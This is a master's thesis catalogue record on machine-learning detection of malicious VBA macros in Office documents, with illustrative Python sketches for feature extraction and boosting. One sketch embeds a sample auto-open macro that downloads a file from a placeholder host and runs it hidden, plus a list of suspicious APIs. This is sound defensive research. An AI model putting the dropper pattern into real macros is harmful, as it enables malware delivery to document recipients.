
Graduate student: 賴怡誠
Yi-Cheng Lai
Thesis title: 機器學習應用於 Office 文件之惡意 VBA 巨集檢測
Malicious VBA Macro Detection in Office Document Using Machine Learning
Advisor: 陳俊良
Jiann-Liang Chen
Oral defense committee: 黃能富
Nen-Fu Huang
呂政修
Jenq-Shiou Leu
洪論評
Lun-Ping Hung
鄧德雋
Der-Jiunn Deng
陳俊良
Jiann-Liang Chen
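Degree: Master
Department: College of Electrical Engineering and Computer Science - Department of Electrical Engineering
Year of publication: 2023
Academic year of graduation: 111
Language: English
Number of pages: 65
Chinese keywords: 機器學習, XGBoost, Office文件, 惡意VBA巨集, P-code, NLP技術
English keywords: Machine Learning, XGBoost, Malicious VBA Macro, Office Document, P-code, NLP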
  • 近年來,隨著企業和個人對於數位化服務的需求,大量極具價值的資料存在於網路空間。Microsoft Office作為市占率最高的辦公軟體,不論是在商業、學術或政府機構中都被廣泛使用,也因此成為網路罪犯最常攻擊的目標之一。散布惡意Office文件被攻擊者大量用於實施網路攻擊的載體,例如在魚叉式網路釣魚攻擊中,經常使用帶有惡意VBA巨集的Office文件來達成惡意檔案下載或惡意指令執行的目的。
    VBA (Visual Basic for Applications)巨集是一種可以在Microsoft Office應用程式中執行的自動化腳本,它可以執行多種功能,包括自動執行特定任務、操作檔案系統和執行外部程式等,對於簡化重複性工作有相當大的助益。惡意 VBA 巨集攻擊常利用魚叉式釣魚攻擊作為管道,透過社交工程的技巧,巧妙地誘使受害者啟用巨集,從而執行惡意程式。攻擊者可以利用這些攻擊進行各種活動,包括竊取敏感資訊、傳播惡意軟體或透過加密文件索要贖金等。
    本研究以靜態分析的方式檢測帶有惡意VBA巨集的Office文件,有別以往採用對VBA source code的分析,本研究也針對VBA經過編譯產生的P-code進行處理,從中提取指令序列,透過NLP技術與降維技術生成指令序列嵌入。最終,分別從VBA source code與P-code中提取了共85個特徵來建立模型。
    本研究採用XGBoost作為檢測模型,透過該模型評估本研究所提出的各項特徵重要性,並以綜合特徵建構檢測模型。經過實驗,模型在驗證資料集中達到98.70%的準確率,證實本研究提出之惡意VBA巨集檢測系統優於先前的研究。


    In recent years, growing demand for digital services from businesses and individuals has put a large amount of highly valuable data into cyberspace. Microsoft Office has the highest market share of any office suite and is widely used in business, academic, and government institutions, which makes it one of the most frequently attacked targets for cybercriminals. Attackers often distribute malicious Office documents as vectors for cyberattacks. For example, spear-phishing attacks often use Office documents with malicious VBA macros to download malicious files or execute malicious commands.
    A VBA (Visual Basic for Applications) macro is an automation script that runs inside a Microsoft Office application. It can automate specific tasks, manipulate the file system, and execute external programs, which makes it useful for simplifying repetitive work. Malicious VBA macro attacks are usually delivered through spear phishing, where social engineering lures the victim into enabling macros so that the malicious code runs. Attackers can use these attacks to steal sensitive information, spread malware, or encrypt files and demand ransom.
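The capabilities described above (auto-execution, running external programs, downloading files, touching the file system) are the kind of behavior a static scan of VBA source can count. The following is a minimal sketch under stated assumptions: the keyword groups and the `extract_features` helper are hypothetical illustrations, not the feature set defined in the thesis, and the scan does not strip comments or string literals.

```python
import re

# Hypothetical keyword groups; the thesis's actual features are not listed in this record.
AUTO_EXEC = ("AutoOpen", "Auto_Open", "Document_Open", "Workbook_Open")
SUSPICIOUS = {
    "run_program": ("Shell", "ShellExecute"),
    "download": ("URLDownloadToFile", "MSXML2.XMLHTTP"),
    "file_system": ("Kill", "FileCopy", "Scripting.FileSystemObject"),
}


def count_keywords(source, words):
    """Count case-insensitive whole-identifier occurrences of each keyword."""
    total = 0
    for word in words:
        pattern = r"(?<![A-Za-z0-9_])" + re.escape(word) + r"(?![A-Za-z0-9_])"
        total += len(re.findall(pattern, source, flags=re.IGNORECASE))
    return total


def extract_features(source):
    """Map VBA source text to a small dictionary of keyword counts."""
    features = {"auto_exec": count_keywords(source, AUTO_EXEC)}
    for name, words in SUSPICIOUS.items():
        features[name] = count_keywords(source, words)
    return features


# Made-up macro text used only to exercise the scan.
sample = r'''
Sub AutoOpen()
    Dim p As String
    p = Environ("TEMP") & "\a.exe"
    URLDownloadToFile 0, "http://example.invalid/a", p, 0, 0
    Shell p, vbHide
End Sub
'''
features = extract_features(sample)
```

Counts like these are easy to defeat with obfuscation, which is one reason a detector may also look at the compiled P-code rather than the source text alone.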
    This study uses static analysis combined with machine learning to detect Office documents that contain malicious VBA macros. Unlike previous studies, which analyzed only the VBA source code, this study also processes the P-code produced when VBA is compiled: it extracts instruction sequences from the P-code and turns them into embeddings using NLP and dimensionality-reduction techniques. In total, 85 features are extracted from the VBA source code and the P-code to build the model.
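The abstract does not name the specific embedding method, so the sketch below only illustrates the general idea of turning an instruction sequence into a fixed-length vector. It assumes opcode bigrams weighted by TF-IDF and then folded into a few dimensions with feature hashing; both choices are stand-ins, and the opcode mnemonics and function names are hypothetical placeholders.

```python
import hashlib
import math
from collections import Counter


def ngrams(opcodes, n=2):
    """Return contiguous opcode n-grams, each joined with '|'."""
    return ["|".join(opcodes[i:i + n]) for i in range(len(opcodes) - n + 1)]


def tfidf(sequences, n=2):
    """Return one sparse TF-IDF dict per opcode sequence."""
    counts = [Counter(ngrams(seq, n)) for seq in sequences]
    # Document frequency: iterating a Counter yields each n-gram once per sequence.
    df = Counter(gram for c in counts for gram in c)
    total = len(sequences)
    vectors = []
    for c in counts:
        length = sum(c.values()) or 1
        vectors.append({
            gram: (k / length) * (math.log((1 + total) / (1 + df[gram])) + 1.0)
            for gram, k in c.items()
        })
    return vectors


def hash_embed(vector, dim=8):
    """Fold a sparse vector into `dim` signed buckets, then L2-normalise."""
    out = [0.0] * dim
    for gram, weight in vector.items():
        h = int.from_bytes(hashlib.sha256(gram.encode("utf-8")).digest()[:8], "big")
        sign = 1.0 if (h >> 63) == 0 else -1.0
        out[h % dim] += sign * weight
    norm = math.sqrt(sum(x * x for x in out))
    return [x / norm for x in out] if norm else out


# Hypothetical instruction sequences; the mnemonics are placeholders.
sequences = [
    ["FuncDefn", "LitStr", "ArgsCall", "EndSub"],
    ["FuncDefn", "LitStr", "LitStr", "Concat", "ArgsCall", "EndSub"],
]
embeddings = [hash_embed(v) for v in tfidf(sequences)]
```

Each document ends up with a vector of the same length regardless of how many instructions its macro contains, which is what allows sequence information to sit alongside other tabular features in a single model.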
    XGBoost serves as the detection model. It is used to evaluate the importance of each proposed feature, and the final detector is trained on the combined feature set. In the experiments, the model reached 98.70% accuracy on the validation dataset, which the study takes as confirmation that the proposed malicious VBA macro detection system outperforms previous studies.
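To make the idea of gain-based feature importance concrete, here is a pure-Python stand-in for gradient-boosted trees. It is not XGBoost and not the thesis's model: it assumes depth-1 trees, logistic loss, and the second-order split gain described in the XGBoost paper by Chen and Guestrin, and it runs on made-up toy data. All names and parameter values are illustrative; a real experiment would use the `xgboost` package.

```python
import math


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def best_stump(X, g, h, lam):
    """Find the (feature, threshold) split with the largest second-order gain."""
    G, H = sum(g), sum(h)
    best = None  # (gain, feature, threshold, left_weight, right_weight)
    for j in range(len(X[0])):
        for t in sorted({row[j] for row in X}):
            left = [i for i, row in enumerate(X) if row[j] <= t]
            if len(left) == len(X):
                continue  # no samples would fall on the right side
            GL = sum(g[i] for i in left)
            HL = sum(h[i] for i in left)
            GR, HR = G - GL, H - HL
            gain = 0.5 * (GL ** 2 / (HL + lam) + GR ** 2 / (HR + lam)
                          - G ** 2 / (H + lam))
            if best is None or gain > best[0]:
                best = (gain, j, t, -GL / (HL + lam), -GR / (HR + lam))
    return best


def fit(X, y, rounds=10, eta=0.3, lam=1.0):
    """Boost stumps on logistic loss; accumulate split gain per feature."""
    F = [0.0] * len(X)
    stumps, importance = [], [0.0] * len(X[0])
    for _ in range(rounds):
        p = [sigmoid(f) for f in F]
        g = [pi - yi for pi, yi in zip(p, y)]   # first-order gradients
        h = [pi * (1.0 - pi) for pi in p]       # second-order gradients
        best = best_stump(X, g, h, lam)
        if best is None or best[0] <= 0.0:
            break
        gain, j, t, wl, wr = best
        stumps.append((j, t, eta * wl, eta * wr))
        importance[j] += gain
        F = [f + (eta * wl if row[j] <= t else eta * wr) for f, row in zip(F, X)]
    return stumps, importance


def predict(stumps, row):
    score = sum(wl if row[j] <= t else wr for j, t, wl, wr in stumps)
    return 1 if score > 0.0 else 0


def accuracy(y_true, y_pred):
    return sum(a == b for a, b in zip(y_true, y_pred)) / len(y_true)


# Toy data: feature 0 separates the classes, feature 1 is noise.
X = [[0.1, 5], [0.2, 1], [0.3, 4], [0.8, 2], [0.9, 5], [0.7, 1]]
y = [0, 0, 0, 1, 1, 1]
stumps, importance = fit(X, y)
train_accuracy = accuracy(y, [predict(stumps, row) for row in X])
```

On this toy set every split is made on feature 0, so all accumulated gain lands there and the noise feature keeps an importance of zero. Ranking features by accumulated gain in this way is one common reading of "feature importance" for boosted trees.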

    摘要
    Abstract
    List of Figures
    List of Tables
    Chapter 1 Introduction
        1.1 Motivation
        1.2 Contributions
        1.3 Organization
    Chapter 2 Related Work
        2.1 Microsoft Office files
        2.2 VBA Macro
        2.3 Malicious Macro Threats
        2.4 Detection of Malicious VBA Scripts
            2.4.1 Static Analysis of VBA Macro
            2.4.2 Dynamic Analysis of VBA Macro
            2.4.3 Machine Learning Approach
    Chapter 3 Proposed System
        3.1 System Architecture
        3.2 Data Collection
            3.2.1 Crawler Technology
            3.2.2 Data Source
        3.3 Data Preprocessing
            3.3.1 VBA-behavior-based Features
            3.3.2 P-code-structure-based Features
        3.4 Feature Definition
            3.4.1 VBA-behavior-based Features
            3.4.2 P-code-structure-based Features
        3.5 Detection Model Architecture
    Chapter 4 Performance Analysis
        4.1 System Environment and Parameter Settings
        4.2 Performance Evaluation Metrics
        4.3 Performance Analysis
            4.3.1 Feature Analysis of VBA-behavior-based
            4.3.2 Feature Analysis of P-code-structure-based
            4.3.3 Feature Analysis of All Features
        4.4 Comparison of Different Study
        4.5 Summary
    Chapter 5 Conclusions and Future Works
        5.1 Conclusions
        5.2 Future Works

